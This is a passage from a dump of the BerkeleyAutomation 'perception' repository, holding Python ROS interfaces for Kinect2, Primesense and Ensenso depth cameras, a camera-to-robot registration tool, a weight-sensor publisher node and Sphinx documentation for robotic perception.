sensor_dir = os.path.join(output_dir, sensor_name)\n raw_dir = os.path.join(sensor_dir, \"raw\")\n if not os.path.exists(raw_dir):\n os.mkdir(raw_dir)\n\n camera_intr_filename = os.path.join(raw_dir, \"camera_intr.intr\")\n camera_intr.save(camera_intr_filename)\n camera_pose_filename = os.path.join(raw_dir, \"T_camera_world.tf\")\n T_camera_world.save(camera_pose_filename)\n\n # collect K images\n for k in range(num_images):\n logging.info(\"Test case %d of %d\" % (k, num_images))\n\n # set test case\n train = 0\n split = TEST_ID\n if k in train_image_indices:\n train = 1\n split = TRAIN_ID\n if train:\n num_objects = min(\n max(num_objs_rv.rvs(size=1)[0] + 1, min_num_objects), num_train\n )\n obj_names = [\n objects[i]\n for i in np.random.choice(\n train_indices, size=num_objects, replace=False\n )\n ]\n else:\n num_objects = min(\n max(num_objs_rv.rvs(size=1)[0] + 1, min_num_objects), num_test\n )\n obj_names = [\n objects[i]\n for i in np.random.choice(\n test_indices, size=num_objects, replace=False\n )\n ]\n\n # get human consent\n message = \"Please place %d objects:\\n\" % (num_objects)\n for name in obj_names:\n message += \"\\t{}\\n\".format(name)\n message += \"Hit ENTER when finished.\"\n utils.keyboard_input(message=message)\n\n # capture\n for sensor_name, sensor in sensors.iteritems():\n logging.info(\"Capturing images from sensor %s\" % (sensor_name))\n\n # read pose and intrinsics\n sensor_pose = sensor_poses[sensor_name]\n camera_intr = camera_intrs[sensor_name]\n workspace_im = workspace_ims[sensor_name]\n dataset = datasets[sensor_name]\n T_camera_world = sensor_pose\n datapoint = dataset.datapoint_template\n\n # read raw images\n raw_color_im, raw_depth_im, _ = sensor.frames()\n\n # resize\n raw_color_im = raw_color_im.resize(im_rescale_factor)\n raw_depth_im = raw_depth_im.resize(\n im_rescale_factor, interp=\"nearest\"\n )\n\n # preprocess\n color_im, depth_im, segmask = preprocess_images(\n raw_color_im,\n raw_depth_im,\n camera_intr,\n T_camera_world,\n workspace_box,\n workspace_im,\n image_proc_config,\n )\n\n # visualize\n if vis:\n gui = plt.figure(0)\n plt.clf()\n vis2d.subplot(2, 3, 1)\n vis2d.imshow(raw_color_im)\n vis2d.title(\"RAW COLOR\")\n vis2d.subplot(2, 3, 2)\n vis2d.imshow(raw_depth_im)\n vis2d.title(\"RAW DEPTH\")\n vis2d.subplot(2, 3, 4)\n vis2d.imshow(color_im)\n vis2d.title(\"COLOR\")\n vis2d.subplot(2, 3, 5)\n vis2d.imshow(depth_im)\n vis2d.title(\"DEPTH\")\n vis2d.subplot(2, 3, 6)\n vis2d.imshow(segmask)\n vis2d.title(\"SEGMASK\")\n plt.draw()\n plt.pause(GUI_PAUSE)\n\n # save data\n datapoint[\"split\"] = split\n datapoint[\"camera_intrs\"] = camera_intr.vec\n datapoint[\"camera_poses\"] = sensor_pose.vec\n datapoint[\"raw_color_ims\"] = raw_color_im.raw_data\n datapoint[\"raw_depth_ims\"] = raw_depth_im.raw_data\n datapoint[\"color_ims\"] = color_im.raw_data\n datapoint[\"depth_ims\"] = depth_im.raw_data\n datapoint[\"segmasks\"] = segmask.raw_data\n dataset.add(datapoint)\n\n # save raw data\n if save_raw:\n sensor_dir = os.path.join(output_dir, sensor_name)\n raw_dir = os.path.join(sensor_dir, \"raw\")\n\n raw_color_im_filename = os.path.join(\n raw_dir, \"raw_color_%d.png\" % (k)\n )\n raw_color_im.save(raw_color_im_filename)\n color_im_filename = os.path.join(raw_dir, \"color_%d.png\" % (k))\n color_im.save(color_im_filename)\n\n raw_depth_im_filename = os.path.join(\n raw_dir, \"raw_depth_%d.npy\" % (k)\n )\n raw_depth_im.save(raw_depth_im_filename)\n depth_im_filename = os.path.join(raw_dir, \"depth_%d.npy\" % (k))\n depth_im.save(depth_im_filename)\n\n segmask_filename = os.path.join(\n raw_dir, \"segmask_%d.png\" % (k)\n )\n segmask.save(segmask_filename)\n\n # stop all sensors\n for sensor_name, sensor in sensors.iteritems():\n datasets[sensor_name].flush()\n sensor.stop()\n"
},
{
"alpha_fraction": 0.6272727251052856,
"alphanum_fraction": 0.6272727251052856,
"avg_line_length": 25.399999618530273,
"blob_id": "2773db231426d5162354a2f03b457000fd57d1dd",
"content_id": "8247b4767652284b6603918a7b3656c96ab7f39c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 25,
"path": "/perception/exceptions.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "def closure(exc):\n \"\"\"\n Taken from Trimesh:\n https://github.com/mikedh/trimesh/blob/master/trimesh/exceptions.py.\n Return a function which will accept any arguments\n but raise the exception when called.\n Parameters\n ------------\n exc : Exception\n Will be raised later\n Returns\n -------------\n failed : function\n When called will raise `exc`\n \"\"\"\n # scoping will save exception\n def failed(*args, **kwargs):\n raise exc\n\n return failed\n\n\nclass SensorUnresponsiveException(Exception):\n def __init__(self, *args, **kwargs):\n super(SensorUnresponsiveException, self).__init__(*args, **kwargs)\n"
},
{
"alpha_fraction": 0.5694703459739685,
"alphanum_fraction": 0.5737290382385254,
"avg_line_length": 29.669387817382812,
"blob_id": "0b9a2634e5ac8d722050e1e8a506c8cce9e1ec7c",
"content_id": "1c57d189f2d7e3dc943d1c567cf40f3c85958cd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7514,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 245,
"path": "/perception/kinect2_ros_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClass for interfacing with the Primesense RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport time\n\nimport numpy as np\nimport rospy\nimport sensor_msgs.msg\nfrom autolab_core import CameraIntrinsics, ColorImage, DepthImage, Image\nfrom autolab_core.constants import MM_TO_METERS\nfrom cv_bridge import CvBridge, CvBridgeError\n\nfrom .camera_sensor import CameraSensor\n\n\nclass Kinect2BridgedQuality:\n \"\"\"Kinect quality for bridged mode\"\"\"\n\n HD = \"hd\"\n QUARTER_HD = \"qhd\"\n SD = \"sd\"\n\n\nclass KinectSensorBridged(CameraSensor):\n \"\"\"Class for interacting with a Kinect v2 RGBD sensor through the kinect\n bridge https://github.com/code-iai/iai_kinect2. This is preferrable for\n visualization and debug because the kinect bridge will continuously\n publish image and point cloud info.\n \"\"\"\n\n def __init__(\n self,\n quality=Kinect2BridgedQuality.HD,\n frame=\"kinect2_rgb_optical_frame\",\n ):\n \"\"\"Initialize a Kinect v2 sensor which connects to the\n iai_kinect2 bridge\n ----------\n quality : :obj:`str`\n The quality (HD, Quarter-HD, SD) of the image data that\n should be subscribed to\n frame : :obj:`str`\n The name of the frame of reference in which the sensor resides.\n If None, this will be set to 'kinect2_rgb_optical_frame'\n \"\"\"\n # set member vars\n self._frame = frame\n\n self.topic_image_color = \"/kinect2/%s/image_color_rect\" % (quality)\n self.topic_image_depth = \"/kinect2/%s/image_depth_rect\" % (quality)\n self.topic_info_camera = \"/kinect2/%s/camera_info\" % (quality)\n\n self._initialized = False\n self._format = None\n self._camera_intr = None\n self._cur_depth_im = None\n self._running = False\n self._bridge = CvBridge()\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n def _set_camera_properties(self, msg):\n \"\"\"Set the camera intrinsics from an info msg.\"\"\"\n focal_x = msg.K[0]\n focal_y = msg.K[4]\n center_x = msg.K[2]\n center_y = msg.K[5]\n im_height = msg.height\n im_width = msg.width\n self._camera_intr = CameraIntrinsics(\n self._frame,\n focal_x,\n focal_y,\n center_x,\n center_y,\n height=im_height,\n width=im_width,\n )\n\n def _process_image_msg(self, msg):\n \"\"\"Process an image message and return a numpy array with the image data\n Returns\n -------\n :obj:`numpy.ndarray` containing the image in the image message\n\n Raises\n ------\n CvBridgeError\n If the bridge is not able to convert the image\n \"\"\"\n encoding = msg.encoding\n try:\n image = self._bridge.imgmsg_to_cv2(msg, encoding)\n except CvBridgeError as e:\n rospy.logerr(e)\n return image\n\n def _color_image_callback(self, image_msg):\n \"\"\"subscribe to image topic and keep it up to date\"\"\"\n color_arr = self._process_image_msg(image_msg)\n self._cur_color_im = ColorImage(color_arr[:, :, ::-1], self._frame)\n\n def _depth_image_callback(self, image_msg):\n \"\"\"subscribe to depth image topic and keep it up to date\"\"\"\n encoding = image_msg.encoding\n try:\n depth_arr = self._bridge.imgmsg_to_cv2(image_msg, encoding)\n except CvBridgeError as e:\n rospy.logerr(e)\n depth = np.array(depth_arr * MM_TO_METERS, np.float32)\n self._cur_depth_im = DepthImage(depth, self._frame)\n\n def _camera_info_callback(self, msg):\n \"\"\"Callback for reading camera info.\"\"\"\n self._camera_info_sub.unregister()\n self._set_camera_properties(msg)\n\n @property\n def ir_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : IR camera intrinsics of Kinect.\"\"\"\n return self._camera_intr\n\n @property\n def is_running(self):\n \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n return self._running\n\n @property\n def frame(self):\n \"\"\":obj:`str` : The reference frame of the sensor.\"\"\"\n return self._frame\n\n def start(self):\n \"\"\"Start the sensor\"\"\"\n # initialize subscribers\n self._image_sub = rospy.Subscriber(\n self.topic_image_color,\n sensor_msgs.msg.Image,\n self._color_image_callback,\n )\n self._depth_sub = rospy.Subscriber(\n self.topic_image_depth,\n sensor_msgs.msg.Image,\n self._depth_image_callback,\n )\n self._camera_info_sub = rospy.Subscriber(\n self.topic_info_camera,\n sensor_msgs.msg.CameraInfo,\n self._camera_info_callback,\n )\n\n timeout = 10\n try:\n rospy.loginfo(\"waiting to recieve a message from the Kinect\")\n rospy.wait_for_message(\n self.topic_image_color, sensor_msgs.msg.Image, timeout=timeout\n )\n rospy.wait_for_message(\n self.topic_image_depth, sensor_msgs.msg.Image, timeout=timeout\n )\n rospy.wait_for_message(\n self.topic_info_camera,\n sensor_msgs.msg.CameraInfo,\n timeout=timeout,\n )\n except rospy.ROSException as e:\n print(\"KINECT NOT FOUND\")\n rospy.logerr(\"Kinect topic not found, Kinect not started\")\n rospy.logerr(e)\n\n while self._camera_intr is None:\n time.sleep(0.1)\n\n self._running = True\n\n def stop(self):\n \"\"\"Stop the sensor\"\"\"\n # check that everything is running\n if not self._running:\n logging.warning(\"Kinect not running. Aborting stop\")\n return False\n\n # stop subs\n self._image_sub.unregister()\n self._depth_sub.unregister()\n self._camera_info_sub.unregister\n\n self._running = False\n return True\n\n def frames(self):\n \"\"\"Retrieve a new frame from the Kinect and convert it to a ColorImage,\n a DepthImage is always none for this type\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n The ColorImage and DepthImage of the current frame.\n\n Raises\n ------\n RuntimeError\n If the Kinect stream is not running.\n \"\"\"\n # wait for a new image\n while self._cur_depth_im is None or self._cur_color_im is None:\n time.sleep(0.01)\n\n # read next image\n depth_im = self._cur_depth_im\n color_im = self._cur_color_im\n\n self._cur_color_im = None\n self._cur_depth_im = None\n\n # TODO add ir image\n return color_im, depth_im\n\n def median_depth_img(self, num_img=1, fill_depth=0.0):\n \"\"\"Collect a series of depth images and return the median of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The median DepthImage collected from the frames.\n \"\"\"\n depths = []\n\n for _ in range(num_img):\n _, depth, _ = self.frames()\n depths.append(depth)\n\n median_depth = Image.median_images(depths)\n median_depth.data[median_depth.data == 0.0] = fill_depth\n return median_depth\n"
},
{
"alpha_fraction": 0.603352963924408,
"alphanum_fraction": 0.6076332926750183,
"avg_line_length": 30.149999618530273,
"blob_id": "efe517b839f0e60233b9de55061e23b67111807f",
"content_id": "b6737aea8173e78b07a9456fac49ebafdec7a705",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5607,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 180,
"path": "/tools/register_ensenso.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nRegister Ensenso to the robot\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport time\n\nimport numpy as np\nimport rospy\nfrom autolab_core import Point, RigidTransform, YamlConfig, keyboard_input\nfrom ensenso.srv import CollectPattern, EstimatePatternPose\nfrom yumipy import YuMiConstants as YMC\nfrom yumipy import YuMiRobot\n\nfrom perception import RgbdSensorFactory\n\n\ndef register_ensenso(config):\n # set parameters\n average = True\n add_to_buffer = True\n clear_buffer = False\n decode = True\n grid_spacing = -1\n\n # read parameters\n num_patterns = config[\"num_patterns\"]\n max_tries = config[\"max_tries\"]\n\n # load tf pattern to world\n T_pattern_world = RigidTransform.load(config[\"pattern_tf\"])\n\n # initialize sensor\n sensor_frame = config[\"sensor_frame\"]\n sensor_config = {\"frame\": sensor_frame}\n logging.info(\"Creating sensor\")\n sensor = RgbdSensorFactory.sensor(\"ensenso\", sensor_config)\n\n # initialize node\n rospy.init_node(\"register_ensenso\", anonymous=True)\n rospy.wait_for_service(\"/%s/collect_pattern\" % (sensor_frame))\n rospy.wait_for_service(\"/%s/estimate_pattern_pose\" % (sensor_frame))\n\n # start sensor\n print(\"Starting sensor\")\n sensor.start()\n time.sleep(1)\n print(\"Sensor initialized\")\n\n # perform registration\n try:\n print(\"Collecting patterns\")\n num_detected = 0\n i = 0\n while num_detected < num_patterns and i < max_tries:\n collect_pattern = rospy.ServiceProxy(\n \"/%s/collect_pattern\" % (sensor_frame), CollectPattern\n )\n resp = collect_pattern(\n add_to_buffer, clear_buffer, decode, grid_spacing\n )\n if resp.success:\n print(\"Detected pattern %d\" % (num_detected))\n num_detected += 1\n i += 1\n\n if i == max_tries:\n raise ValueError(\"Failed to detect calibration pattern!\")\n\n print(\"Estimating pattern pose\")\n estimate_pattern_pose = rospy.ServiceProxy(\n \"/%s/estimate_pattern_pose\" % (sensor_frame), EstimatePatternPose\n )\n resp = estimate_pattern_pose(average)\n\n q_pattern_camera = np.array(\n [\n resp.pose.orientation.w,\n resp.pose.orientation.x,\n resp.pose.orientation.y,\n resp.pose.orientation.z,\n ]\n )\n t_pattern_camera = np.array(\n [resp.pose.position.x, resp.pose.position.y, resp.pose.position.z]\n )\n T_pattern_camera = RigidTransform(\n rotation=q_pattern_camera,\n translation=t_pattern_camera,\n from_frame=\"pattern\",\n to_frame=sensor_frame,\n )\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\" % (str(e)))\n\n # compute final transformation\n T_camera_world = T_pattern_world * T_pattern_camera.inverse()\n\n # save final transformation\n output_dir = os.path.join(config[\"calib_dir\"], sensor_frame)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n pose_filename = os.path.join(output_dir, \"%s_to_world.tf\" % (sensor_frame))\n T_camera_world.save(pose_filename)\n intr_filename = os.path.join(output_dir, \"%s.intr\" % (sensor_frame))\n sensor.ir_intrinsics.save(intr_filename)\n\n # log final transformation\n print(\"Final Result for sensor %s\" % (sensor_frame))\n print(\"Rotation: \")\n print(T_camera_world.rotation)\n print(\"Quaternion: \")\n print(T_camera_world.quaternion)\n print(\"Translation: \")\n print(T_camera_world.translation)\n\n # stop sensor\n sensor.stop()\n\n # move robot to calib pattern center\n if config[\"use_robot\"]:\n # create robot pose relative to target point\n target_pt_camera = Point(T_pattern_camera.translation, sensor_frame)\n target_pt_world = T_camera_world * target_pt_camera\n R_gripper_world = np.array([[1.0, 0, 0], [0, -1.0, 0], [0, 0, -1.0]])\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"world\",\n )\n\n # move robot to pose\n y = YuMiRobot(tcp=YMC.TCP_SUCTION_STIFF)\n y.reset_home()\n time.sleep(1)\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"world\", to_frame=\"world\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n\n y.right.goto_pose(T_gripper_world_lift)\n y.right.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n y.right.goto_pose(T_gripper_world_lift)\n y.reset_home()\n y.stop()\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a camera to a robot\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/register_ensenso.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n # perform registration\n register_ensenso(config)\n"
},
{
"alpha_fraction": 0.5914249420166016,
"alphanum_fraction": 0.5963289737701416,
"avg_line_length": 33.6456298828125,
"blob_id": "ba179c9e926eaa23fcc534edf27932b261b13577",
"content_id": "98e1725199dfc6931376417ffe504fd22532a18c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7137,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 206,
"path": "/perception/primesense_ros_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport rospy\nfrom autolab_core import ColorImage, DepthImage, Image\nfrom autolab_core.constants import MM_TO_METERS\n\nfrom perception.srv import ImageBuffer, ImageBufferResponse\n\nfrom .primesense_sensor import PrimesenseSensor\n\nImageBufferResponse = rospy.numpy_msg.numpy_msg(ImageBufferResponse)\nImageBuffer._response_class = ImageBufferResponse\n\n\nclass PrimesenseSensor_ROS(PrimesenseSensor):\n \"\"\"ROS-based version of Primesense RGBD sensor interface\n\n Requires starting the openni2 ROS driver and the two stream_image_buffer\n (image_buffer.py) ros services for depth and color images. By default,\n the class will look for the depth_image buffer and color_image buffers\n under \"{frame}/depth/stream_image_buffer\" and\n \"{frame}/rgb/stream_image_buffer\" respectively (within the current\n ROS namespace).\n\n This can be changed by passing in depth_image_buffer, color_image_buffer\n (which change where the program looks for the buffer services) and\n depth_absolute, color_absolute (which changes whether the program prepends\n the current ROS namespace).\n \"\"\"\n\n def __init__(\n self,\n depth_image_buffer=None,\n depth_absolute=False,\n color_image_buffer=None,\n color_absolute=False,\n flip_images=True,\n frame=None,\n staleness_limit=10.0,\n timeout=10,\n ):\n self._flip_images = flip_images\n self._frame = frame\n\n self.staleness_limit = staleness_limit\n self.timeout = timeout\n\n if self._frame is None:\n self._frame = \"primesense\"\n self._color_frame = \"%s_color\" % (self._frame)\n self._ir_frame = (\n self._frame\n ) # same as color since we normally use this one\n\n # Set image buffer locations\n self._depth_image_buffer = (\n \"{0}/depth/stream_image_buffer\".format(frame)\n if depth_image_buffer is None\n else depth_image_buffer\n )\n self._color_image_buffer = (\n \"{0}/rgb/stream_image_buffer\".format(frame)\n if color_image_buffer is None\n else color_image_buffer\n )\n if not depth_absolute:\n self._depth_image_buffer = (\n rospy.get_namespace() + self._depth_image_buffer\n )\n if not color_absolute:\n self._color_image_buffer = (\n rospy.get_namespace() + self._color_image_buffer\n )\n\n def start(self):\n \"\"\"For PrimesenseSensor, start/stop by launching/stopping\n the associated ROS services\"\"\"\n pass\n\n def stop(self):\n \"\"\"For PrimesenseSensor, start/stop by launching/stopping\n the associated ROS services\"\"\"\n pass\n\n def _ros_read_images(self, stream_buffer, number, staleness_limit=10.0):\n \"\"\"Reads images from a stream buffer\n\n Parameters\n ----------\n stream_buffer : string\n absolute path to the image buffer service\n number : int\n The number of frames to get. Must be less than the image buffer\n service's current buffer size\n staleness_limit : float, optional\n Max value of how many seconds old the oldest image is. If the\n oldest image grabbed is older than this value, a RuntimeError\n is thrown. If None, staleness is ignored.\n\n Returns\n -------\n List of nump.ndarray objects, each one an image\n Images are in reverse chronological order (newest first)\n \"\"\"\n rospy.wait_for_service(stream_buffer, timeout=self.timeout)\n ros_image_buffer = rospy.ServiceProxy(stream_buffer, ImageBuffer)\n ret = ros_image_buffer(number, 1)\n if staleness_limit is not None:\n if ret.timestamps[-1] > staleness_limit:\n raise RuntimeError(\n \"Got data {0} seconds old, \"\n \"more than allowed {1} seconds\".format(\n ret.timestamps[-1], staleness_limit\n )\n )\n\n data = ret.data.reshape(\n ret.data_dim1, ret.data_dim2, ret.data_dim3\n ).astype(ret.dtype)\n\n # Special handling for 1 element, since dstack's behavior is different\n if number == 1:\n return [data]\n return np.dsplit(data, number)\n\n @property\n def is_running(self):\n \"\"\"bool : True if the image buffers are running, or false otherwise.\n\n Does this by grabbing one frame with staleness checking\n \"\"\"\n try:\n self.frames()\n except RuntimeError:\n return False\n return True\n\n def _read_depth_images(self, num_images):\n \"\"\"Reads depth images from the device\"\"\"\n depth_images = self._ros_read_images(\n self._depth_image_buffer, num_images, self.staleness_limit\n )\n for i in range(0, num_images):\n depth_images[i] = (\n depth_images[i] * MM_TO_METERS\n ) # convert to meters\n if self._flip_images:\n depth_images[i] = np.flipud(depth_images[i])\n depth_images[i] = np.fliplr(depth_images[i])\n depth_images[i] = DepthImage(depth_images[i], frame=self._frame)\n return depth_images\n\n def _read_color_images(self, num_images):\n \"\"\"Reads color images from the device\"\"\"\n color_images = self._ros_read_images(\n self._color_image_buffer, num_images, self.staleness_limit\n )\n for i in range(0, num_images):\n if self._flip_images:\n color_images[i] = np.flipud(color_images[i].astype(np.uint8))\n color_images[i] = np.fliplr(color_images[i].astype(np.uint8))\n color_images[i] = ColorImage(color_images[i], frame=self._frame)\n return color_images\n\n def _read_depth_image(self):\n \"\"\"Wrapper to maintain compatibility\"\"\"\n return self._read_depth_images(1)[0]\n\n def _read_color_image(self):\n \"\"\"Wrapper to maintain compatibility\"\"\"\n return self._read_color_images(1)[0]\n\n def median_depth_img(self, num_img=1, fill_depth=0.0):\n \"\"\"Collect a series of depth images and return the median of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The median DepthImage collected from the frames.\n \"\"\"\n depths = self._read_depth_images(num_img)\n\n median_depth = Image.median_images(depths)\n median_depth.data[median_depth.data == 0.0] = fill_depth\n return median_depth\n\n def min_depth_img(self, num_img=1):\n \"\"\"Collect a series of depth images and return the min of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The min DepthImage collected from the frames.\n \"\"\"\n depths = self._read_depth_images(num_img)\n\n return Image.min_images(depths)\n"
},
{
"alpha_fraction": 0.6697247624397278,
"alphanum_fraction": 0.6857798099517822,
"avg_line_length": 26.1875,
"blob_id": "edc6d006a803a5c81696415953016b8916e1803d",
"content_id": "27d5ac2783021ab7602ce66a798d7d06c43829d7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 872,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 32,
"path": "/docs/source/index.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": ".. perception documentation master file, created by\n sphinx-quickstart on Wed Oct 26 18:16:00 2016.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nBerkeley AutoLab Perception Documentation\n=========================================\nWelcome to the documentation for the Berkeley AutoLab's `perception` module!\nThis module is designed to be useful in a broad set of robotic perception tasks.\nThe `perception` module depends directly on AutoLab's `autolab_core`_ module.\n\n.. _autolab_core: https://github.com/BerkeleyAutomation/autolab_core\n\n.. toctree::\n :maxdepth: 2\n :caption: Installation Guide\n\n install/install.rst\n\n.. toctree::\n :maxdepth: 2\n :caption: API Documentation\n :glob:\n\n api/*\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n\n"
},
{
"alpha_fraction": 0.608858048915863,
"alphanum_fraction": 0.625933825969696,
"avg_line_length": 23.0256404876709,
"blob_id": "012ecd33a4757dc6620c477e9f2884a9ed785f1b",
"content_id": "ba3f564bad23e3c081c2ce1c6da562228d0d16ab",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1874,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 78,
"path": "/tools/kinect2_sensor_bridge.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"\nInterface to the Ensenso N* Sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport signal\nimport sys\nimport time\n\ntry:\n import rospy\nexcept ImportError:\n logging.warning(\n \"Failed to import ROS in Kinect2_sensor.py. \\\n Kinect will not be able to be used in bridged mode\"\n )\n\nfrom perception import RgbdSensorFactory\nfrom perception.kinect2_ros_sensor import Kinect2BridgedQuality\n\n\ndef main(args):\n # from visualization import Visualizer2D as vis2d\n # from visualization import Visualizer3D as vis3d\n import matplotlib.pyplot as vis2d\n\n # set logging\n logging.getLogger().setLevel(logging.DEBUG)\n rospy.init_node(\"kinect_reader\", anonymous=True)\n\n num_frames = 5\n sensor_cfg = {\n \"quality\": Kinect2BridgedQuality.HD,\n \"frame\": \"kinect2_rgb_optical_frame\",\n }\n sensor_type = \"bridged_kinect2\"\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_cfg)\n sensor.start()\n\n def handler(signum, frame):\n rospy.loginfo(\"caught CTRL+C, exiting...\")\n if sensor is not None:\n sensor.stop()\n exit(0)\n\n signal.signal(signal.SIGINT, handler)\n\n total_time = 0\n for i in range(num_frames):\n if i > 0:\n start_time = time.time()\n\n _, depth_im, _ = sensor.frames()\n\n if i > 0:\n total_time += time.time() - start_time\n logging.info(\"Frame %d\" % (i))\n logging.info(\"Avg FPS: %.5f\" % (float(i) / total_time))\n\n depth_im = sensor.median_depth_img(num_img=5)\n color_im, depth_im, _ = sensor.frames()\n\n sensor.stop()\n\n vis2d.figure()\n vis2d.subplot(\"211\")\n vis2d.imshow(depth_im.data)\n vis2d.title(\"Kinect - depth Raw\")\n\n vis2d.subplot(\"212\")\n vis2d.imshow(color_im.data)\n vis2d.title(\"kinect color\")\n vis2d.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.5704632997512817,
"alphanum_fraction": 0.5830115675926208,
"avg_line_length": 26.626667022705078,
"blob_id": "b48bf60bf8dfd64b9da4f47fcd8466ca1100455c",
"content_id": "80cee259e89840f3da5ed1a6da6a28ceba900578",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2072,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 75,
"path": "/ros_nodes/weight_publisher.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"Publisher node for weight sensor.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Float32MultiArray\nfrom std_srvs.srv import Empty\n\nfrom perception import WeightSensor\n\n\nclass WeightPublisher(WeightSensor):\n \"\"\"Publisher ROS node for weight sensors.\n\n Topics\n ------\n weights : Float32MultiArray\n The weights from each of the load cell sensors in grams,\n listed in order of ID.\n\n Services\n --------\n tare : Empty\n Zeros the scale at the current load.\n \"\"\"\n\n def __init__(self, rate=20.0, id_mask=\"F1804\", ntaps=4):\n \"\"\"Initialize the weight publisher.\n\n Parameters\n ----------\n rate : float\n Rate at which weight messages are published\n id_mask : str\n A template for the first n digits of the device IDs\n for valid load cells.\n ntaps : int\n Maximum number of samples to perform filtering over.\n \"\"\"\n super().__init__(id_mask, ntaps, log=False)\n self._rate = rospy.Rate(rate)\n self._pub = rospy.Publisher(\n \"~weights\", Float32MultiArray, queue_size=10\n )\n\n rospy.loginfo(\"Connecting to the Weight Sensor\")\n self.start()\n\n # Tare the sensor\n rospy.loginfo(\"Taring\")\n self.tare()\n\n # Set up tare service\n self._tare_service = rospy.Service(\"~tare\", Empty, self._handle_tare)\n\n # Main loop -- read and publish\n while not rospy.is_shutdown():\n self._pub.publish(Float32MultiArray(data=self.read()))\n self._rate.sleep()\n\n def _handle_tare(self, request):\n \"\"\"Handler for tare service.\"\"\"\n self.tare()\n return []\n\n\nif __name__ == \"__main__\":\n try:\n rospy.init_node(\"weight_sensor\")\n rate = rospy.get_param(\"~rate\", 20.0)\n id_mask = rospy.get_param(\"~id_mask\", \"F1804\")\n ntaps = rospy.get_param(\"~ntaps\", 4)\n rospy.loginfo(\"Starting\")\n WeightPublisher(rate, id_mask, ntaps)\n except rospy.ROSInterruptException:\n pass\n"
},
{
"alpha_fraction": 0.5225911736488342,
"alphanum_fraction": 0.5294864773750305,
"avg_line_length": 30.13559341430664,
"blob_id": "b46da9c1a0c9ac2d3ac5098181389fe56b877f65",
"content_id": "7b4c67da9898703aab22497a05a014f118d953c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5511,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 177,
"path": "/perception/weight_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
